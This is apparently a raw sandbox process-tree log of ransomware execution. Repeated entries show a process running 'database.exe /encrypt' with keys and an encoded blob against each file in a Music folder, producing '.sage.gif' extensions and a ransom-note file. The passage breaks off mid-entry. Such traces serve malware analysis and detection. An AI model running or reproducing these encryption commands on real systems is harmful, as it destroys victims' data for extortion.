                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\CompareRead.wav.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\CompleteEnable.wma.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\DismountWatch.wmx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\EnterGet.vb.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\FindRestart.DVR.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\FormatLock.ps1.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\InstallCheckpoint.ttc.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\InvokeOpen.potx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\JoinRegister.wmf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitApprove.eps.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitApprove.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitPing.otf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\MeasureLock.gif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\MergeSkip.mov.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\NewWrite.tif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ReceiveDebug.potm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
